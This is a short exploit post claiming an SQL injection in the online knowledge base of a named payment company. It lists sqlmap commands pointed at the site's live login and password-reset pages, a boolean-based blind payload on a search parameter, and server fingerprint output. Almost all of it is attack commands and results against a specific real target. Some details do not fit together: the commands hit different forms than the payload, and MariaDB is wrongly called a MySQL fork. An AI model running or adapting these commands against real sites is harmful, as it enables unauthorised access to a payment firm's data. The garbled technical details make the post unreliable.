# Exploit Title: Worldnet Payments Knowledge Base : Start | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "https://docs.worldnettps.com/doku.php?do=login" --forms --dbs --batch
# sqlmap -u "https://docs.worldnettps.com/doku.php?id=start&do=resendpwd" --forms --dbs --batch
---------------------------------------------------------------------------------------------------
.com commercial
Worldnet Payments
Knowledge Base : Start
https://docs.worldnettps.com/doku.php?do=login
https://docs.worldnettps.com/doku.php?id=start&do=resendpwd
---
Parameter: q (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: do=search&id=start&q=kJJJ AND 3044=3044
Vector: AND [INFERENCE]
---
the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL 8 (MariaDB fork)